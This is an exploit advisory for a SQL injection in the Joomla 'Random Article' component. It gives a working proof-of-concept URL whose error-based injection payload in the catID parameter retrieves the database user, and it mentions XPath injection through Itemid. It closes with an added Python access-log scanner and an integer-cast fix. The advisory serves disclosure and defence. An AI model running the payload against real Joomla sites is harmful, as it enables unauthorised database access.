Joomla Random Article component suffers from a remote SQL injection vulnerability.
##################################################################################################
#Exploit Title : Joomla Random Article Component SQL Injection vulnerability
#Author : Jagriti Sahu AKA Incredible
#Vendor Link : http://demo.web-dorado.com
#Date : 23/03/2015
#Discovered at : IndiShell Lab
#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
The Joomla component "Random Article" does not filter the data in the catID and Itemid parameters before passing it to
an SQL query, hence it is vulnerable to SQL injection.
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
The vulnerability is in the catID and Itemid parameters.
////////////////
/// POC ////
///////////////
SQL Injection in catID parameter
=================================
Use error-based double query injection with the catID parameter.
Injected Link--->
http://demo.web-dorado.com
Example: error-based double query injection for retrieving the username --->
http://demo.web-dorado.com/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13
SQL Injection in Itemid parameter
=================================
The Itemid parameter is exploitable using XPath injection.
http://demo.web-dorado.com
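A defender can look for attempts against these two parameters in web server access logs by flagging any com_rand request whose catID or Itemid value is not a plain integer. The following is an added example, not part of the original advisory; it assumes catID is a numeric id as in the PoC and that the server writes combined-format access logs, and the function names and sample log lines are constructed for illustration:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as unfiltered.
WATCHED = ("catID", "Itemid")
# Request line of a combined-format access log entry (assumed log format).
# The lazy match tolerates raw, unencoded spaces inside the URL.
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]+")

def suspicious_params(log_line):
    """Return {param: decoded value} for non-integer catID/Itemid values
    in a com_rand request; empty dict if the line is clean or unrelated."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return {}
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_rand" not in query.get("option", []):
        return {}
    hits = {}
    for name in WATCHED:
        for value in query.get(name, []):
            if not INT_RE.fullmatch(value):
                hits[name] = value
    return hits

def scan(lines):
    """Return (client address, findings) for each flagged log line."""
    results = []
    for line in lines:
        hits = suspicious_params(line)
        if hits:
            results.append((line.split(" ", 1)[0], hits))
    return results

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Mar/2015:10:00:01 +0000] "GET /index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13 HTTP/1.1" 200 512',
    '192.0.2.77 - - [23/Mar/2015:10:00:05 +0000] "GET /index.php?option=com_rand&catID=1%27%20and%20(select%201)--%20-&view=articles&format=raw&Itemid=13 HTTP/1.1" 500 310',
    '192.0.2.10 - - [23/Mar/2015:10:00:09 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

The same integer-only rule is the fix on the server side: casting both parameters to integers before they reach the query removes the injection point.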
###################################################################################################
--==[[Special Thanks to]]==--
# Manish Kishan Tanwar ^_^ #